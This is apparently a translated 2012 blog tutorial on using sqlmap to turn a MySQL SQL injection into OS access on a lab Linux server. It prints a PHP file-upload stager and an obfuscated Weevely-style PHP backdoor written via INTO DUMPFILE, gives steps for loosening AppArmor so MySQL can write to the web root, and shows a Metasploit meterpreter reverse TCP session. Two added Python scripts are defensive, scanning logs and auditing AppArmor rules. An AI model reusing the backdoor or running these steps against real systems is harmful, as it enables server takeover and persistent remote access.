SQLMAP shell — linux
Posted on 2012-9-28 23:54:07
    root@ubuntu:~# apt-get install policycoreutils

Install this first, on the server.

--os-shell
    root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --os-shell
    which web application language does the web server support?
    [1] ASP
    [2] ASPX
    [3] PHP (default)
    [4] JSP
    > 3
    please provide the web server document root [/var/www/]: /tmp/
    [20:34:37] [WARNING] unable to retrieve any web server path
    please provide any additional web server full path to try to upload the agent [Enter for None]:
    [20:34:38] [WARNING] unable to upload the file stager on '/tmp'
    [20:34:38] [INFO] trying to upload the file stager via UNION technique
    [20:34:38] [WARNING] reflective value(s) found and filtering out
    do you want confirmation that the file '/tmp/tmpuhewz.php' has been successfully written on the back-end DBMS file system? [Y/n]
    [20:34:40] [INFO] the file has been successfully written and its size is 721 bytes, but the size differs from the local file '/tmp/tmpVkGTh7' (703 bytes)
    [20:34:40] [WARNING] expect junk characters inside the file as a leftover from UNION query
    [20:34:40] [WARNING] unable to upload the file stager on '/tmp/pen'
    [20:34:40] [INFO] trying to upload the file stager via UNION technique
    do you want confirmation that the file '/tmp/pen/tmpuhewz.php' has been successfully written on the back-end DBMS file system? [Y/n]
    [20:34:41] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
    [20:34:41] [WARNING] HTTP error codes detected during testing:
    404 (Not Found) - 4 times
    [20:34:41] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.8'

    [*] shutting down at 20:34:41
It got written into the /tmp directory. Add the -v10 parameter to show verbose output:

    root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --os-shell -v10

    [20:35:31] [WARNING] unable to upload the file stager on '/tmp'
    [20:35:31] [INFO] trying to upload the file stager via UNION technique
    [20:35:31] [DEBUG] encoding file to its hexadecimal string value
    [20:35:31] [DEBUG] exporting the text file content to file '/tmp/tmpunnea.php'
    [20:35:31] [PAYLOAD] 1 LIMIT 0,1 UNION ALL SELECT NULL,... INTO DUMPFILE '/tmp/tmpunnea.php'#

There is the statement. Let's take a look at the file:

    root@ubuntu:/tmp# cat tmpuevnx.php
    0000000001        hacked By helen<?php
    if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/tmp> <input type=submit name=upload value=upload></form>";}?>
    root@ubuntu:/tmp#
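A defender-side check for the technique shown above: this added Python example (not from the original post) URL-decodes constructed Apache access-log lines, flags queries that contain INTO DUMPFILE/OUTFILE, and decodes MySQL 0x hex literals to reveal an embedded PHP stager. The log lines and the /tmp/x.php path are constructed sample values, not from the post.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (not from the original post). The second
# carries a sqlmap-style UNION ... INTO DUMPFILE payload with a hex-encoded PHP body.
SAMPLE_LOG = [
    '5.5.5.14 - - [28/Sep/2012:20:34:38 +0800] "GET /pen/news.php?id=1 HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '5.5.5.14 - - [28/Sep/2012:20:35:31 +0800] "GET /pen/news.php?id=1%20LIMIT%200,1%20UNION%20ALL%20SELECT%20NULL,0x3c3f706870206563686f2027686921273b203f3e%20INTO%20DUMPFILE%20%27/tmp/x.php%27%23 HTTP/1.1" 200 1432 "-" "sqlmap/1.0-dev"',
    '5.5.5.14 - - [28/Sep/2012:20:36:02 +0800] "GET /pen/news.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# INTO DUMPFILE / INTO OUTFILE is the MySQL primitive that turns a SQL injection into a file write.
FILE_WRITE_RE = re.compile(r'\bINTO\s+(?:DUMP|OUT)FILE\b', re.IGNORECASE)
HEX_LITERAL_RE = re.compile(r'0x([0-9a-fA-F]{2,})')

def decode_hex_literals(query):
    """Return the decoded text of every MySQL 0x... literal in a decoded query string."""
    out = []
    for h in HEX_LITERAL_RE.findall(query):
        if len(h) % 2:          # odd length cannot be a byte string
            continue
        out.append(bytes.fromhex(h).decode('latin-1'))
    return out

def inspect_request(line):
    """Classify one access-log line; return a dict of findings, or None if nothing is suspicious."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = unquote_plus(m.group(1))      # undo the %20 / %27 / %23 encoding seen in the log
    findings = []
    if FILE_WRITE_RE.search(query):
        findings.append('sql-file-write')
    decoded = decode_hex_literals(query)
    if any('<?php' in d or '<?' in d for d in decoded):
        findings.append('hex-encoded-php')
    if 'sqlmap' in line.lower():          # default user agent; trivially changed, so a weak signal
        findings.append('sqlmap-user-agent')
    return {'findings': findings, 'decoded': decoded} if findings else None

def scan(lines):
    """Return (line_index, result) for every suspicious line."""
    hits = []
    for i, line in enumerate(lines):
        r = inspect_request(line)
        if r:
            hits.append((i, r))
    return hits

if __name__ == '__main__':
    for idx, res in scan(SAMPLE_LOG):
        print(idx, res['findings'], res['decoded'])
```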
If you want to write into the web directory, the target directory must be writable. The web root rarely is, so look for an image directory, an upload directory, a generated-HTML directory, or a backup directory.
# On Ubuntu, the default Apache and MySQL install cannot write into the WWW directory, even with 777 permissions!
That is because MySQL is restricted by AppArmor:

    root@ubuntu:/etc/mysql# aa-status | grep mysql
       /usr/sbin/mysqld
       /usr/sbin/mysqld (4468)
    root@ubuntu:/etc/mysql#

nano /etc/apparmor.d/usr.sbin.mysqld
After the line:
    /sys/devices/system/cpu/ r,
add:
    /var/www/* rw,
Then restart:
    root@ubuntu:/etc/mysql# /etc/init.d/apparmor reload
    * Reloading AppArmor profiles                                                                                        [ OK ]
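The profile edit above is exactly what lets the database process write into the web root, so it is also the thing to audit. This added Python example (not part of the original post) parses a constructed excerpt of an AppArmor profile for mysqld, reports every rule that grants write access under a web document root, and strips those rules out; the WEB_ROOTS list and the profile text are assumptions, not copied from a real system.

```python
import re

# Constructed excerpt of /etc/apparmor.d/usr.sbin.mysqld (assumption, not a real
# system's profile), after the edit shown in the post added a write rule for /var/www.
PROFILE_WEAK = """\
/usr/sbin/mysqld {
  #include <abstractions/base>
  /sys/devices/system/cpu/ r,
  /var/www/* rw,
  /var/lib/mysql/ r,
  /var/lib/mysql/** rwk,
  /var/log/mysql/ r,
  /var/log/mysql/* rw,
  /var/run/mysqld/mysqld.pid w,
}
"""

# Directories a web server serves from (assumed list); a database process should never write here,
# because a writable web root turns SELECT ... INTO DUMPFILE into remote code execution.
WEB_ROOTS = ('/var/www/', '/srv/www/', '/usr/share/nginx/html/')

# One AppArmor file rule: an absolute path, whitespace, permission letters, trailing comma.
RULE_RE = re.compile(r'^\s*(/\S+)\s+([a-zA-Z]+),\s*$')

def parse_rules(profile_text):
    """Yield (path, permission_letters) for every file rule in the profile."""
    for line in profile_text.splitlines():
        m = RULE_RE.match(line)
        if m:
            yield m.group(1), m.group(2)

def grants_write(perms):
    # 'w' = write, 'a' = append; either lets the process create or modify a file.
    return 'w' in perms or 'a' in perms

def web_root_writes(profile_text):
    """Return the rules that let the confined process write under a web document root."""
    return [(path, perms) for path, perms in parse_rules(profile_text)
            if grants_write(perms) and any(path.startswith(root) for root in WEB_ROOTS)]

def strip_web_root_writes(profile_text):
    """Return the profile with web-root write rules removed (reload AppArmor afterwards)."""
    kept = []
    for line in profile_text.splitlines(keepends=True):
        m = RULE_RE.match(line)
        if m and grants_write(m.group(2)) and any(m.group(1).startswith(r) for r in WEB_ROOTS):
            continue
        kept.append(line)
    return ''.join(kept)
```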

Now it can write:
    root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --os-shell
    [21:05:27] [WARNING] unable to retrieve the web server document root
    please provide the web server document root [/var/www/]:
    [21:05:28] [WARNING] unable to retrieve any web server path
    please provide any additional web server full path to try to upload the agent [Enter for None]:
    [21:05:29] [INFO] the file stager has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpuwbao.php
    [21:05:39] [INFO] the backdoor has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpbjpzi.php
    [21:05:39] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell> ps -ef
    do you want to retrieve the command standard output? [Y/n/a] Y
    command standard output:
    ---
    UID        PID  PPID  C STIME TTY          TIME CMD
    root         1     0  0 10:43 ?        00:00:00 /sbin/init
    root         2     0  0 10:43 ?        00:00:00 [kthreadd]
    root         3     2  0 10:43 ?        00:00:00 [ksoftirqd/0]
    root         4     2  0 10:43 ?        00:00:00 [migration/0]
    root         5     2  0 10:43 ?        00:00:00 [watchdog/0]

Or you can visit the uploaded stager:
    [21:05:29] [INFO] the file stager has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpuwbao.php

Specifying your own shell

--file-write=/local/shell.php --file-dest=/remote/shell.php

    root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --file-write=/pen/door/Weevely/123 --file-dest=/tmp/v5 --os=linux --dbms=mysql

        sqlmap/1.0-dev-dbce417 - automatic SQL injection and database takeover tool
        http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 20:47:58

    [20:47:58] [INFO] testing connection to the target url
    [20:47:58] [INFO] heuristics detected web page charset 'ascii'
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 7964=7964

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=1 AND (SELECT 6057 FROM(SELECT COUNT(*),CONCAT(0x3a6774693a,(SELECT (CASE WHEN (6057=6057) THEN 1 ELSE 0 END)),0x3a70737a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1 LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x3a6774693a,0x73676c795569626f6a56,0x3a70737a3a)#

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1 AND SLEEP(5)
    ---
    [20:47:58] [INFO] testing MySQL
    [20:47:58] [INFO] confirming MySQL
    [20:47:58] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.10 (Maverick Meerkat)
    web application technology: PHP 5.3.3, Apache 2.2.16
    back-end DBMS: MySQL >= 5.0.0
    do you want confirmation that the file '/tmp/v5' has been successfully written on the back-end DBMS file system? [Y/n] Y
    [20:48:00] [INFO] the file has been successfully written and its size is 605 bytes, but the size differs from the local file '/pen/door/Weevely/123' (588 bytes)
    [20:48:00] [WARNING] expect junk characters inside the file as a leftover from UNION query
    [20:48:00] [INFO] fetched data logged to text files under '/pen/sql/sqlmap/output/5.5.5.8'

    [*] shutting down at 20:48:00

    root@Dis9Team:~#
Take a look at it on the server:

    root@ubuntu:/tmp# cat v5
    1hacked By helen<?php
    $moa = str_replace("en","","stenren_reneenpenlenaencene");
    $cs="GxhpcY2UoYXJyYXkoJpcypc9bXlx3PVpcxzXS8nLpcCcvXHMvJyksIGFycmF5KCcnLCcpcrJykpcsI";
    $kz="GppcvaW4opcYXJyYXpclpcfc2xpY2UoJGEsJGMoJGEpLTMpKSkpKTtlY2hpcvICc8LycuJpcGsuJz4nOpc30=";
    $sj="JGM9J2NvdW50JzskpcYpcT0kX0NPpcT0tJRpcTtppcZipchyZXNldpcCgkYSk9PSd0ZpcScgJiYgJpcG";
    $cw="MoJGEpPjMpeyRrPSdzdCc7ZWNobyAnPCpccuJGsuJz4npcO2V2YpcWwoYmFzZTY0X2RlY29kpcZShwcmpcVnX3Jlcpc";
    $mx = $moa("v", "", "vbavsvev6v4v_vdvevcode");
    $cd = $moa("l","","lcrleatel_lflunlcltioln");
    $irk = $cd('', $mx($moa("pc", "", $sj.$cw.$cs.$kz))); $irk();
    ?>root@ubuntu:/tmp#

--os-pwn

Works together with MSF, but it's not stable.

    root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --os-pwn
    which web application language does the web server support?
    [1] ASP
    [2] ASPX
    [3] PHP (default)
    [4] JSP
    > 3
    [21:08:03] [WARNING] unable to retrieve the web server document root
    please provide the web server document root [/var/www/]:
    [21:08:12] [WARNING] unable to retrieve any web server path
    please provide any additional web server full path to try to upload the agent [Enter for None]:
    [21:08:13] [INFO] the file stager has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpuwydk.php
    [21:08:13] [INFO] the file stager has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpuwydk.php
    [21:08:23] [INFO] the backdoor has been successfully uploaded on '/var/www' - http://5.5.5.8:80/tmpbakhx.php
    [21:08:23] [INFO] creating Metasploit Framework multi-stage shellcode
For the shell, choosing [2] Bind TCP: Listen on the database host for a connection works best.

    which connection type do you want to use?
    [1] Reverse TCP: Connect back from the database host to this machine (default)
    [2] Bind TCP: Listen on the database host for a connection
    > 1
    which is the local address? [5.5.5.14] 5.5.5.14
    which local port number do you want to use? [24896] 5412
    which payload do you want to use?
    [1] Shell (default)
    [2] Meterpreter (beta)
    > 2
    [21:08:56] [INFO] creation in progress ........................ done
    what is the back-end database management system architecture?
    [1] 32-bit (default)
    [2] 64-bit
    > 1
    [21:09:24] [INFO] uploading shellcodeexec to '/var/www/shellcodeexec.x32'
    [21:09:24] [INFO] running Metasploit Framework command line interface locally, please wait..
    PAYLOAD => linux/x86/meterpreter/reverse_tcp
    EXITFUNC => process
    LPORT => 5412
    LHOST => 5.5.5.14
    [*] Started reverse handler on 5.5.5.14:5412
    [*] Starting the payload handler...
    [21:10:18] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
    [*] Transmitting intermediate stager for over-sized stage...(100 bytes)
    [*] Sending stage (1126400 bytes) to 5.5.5.8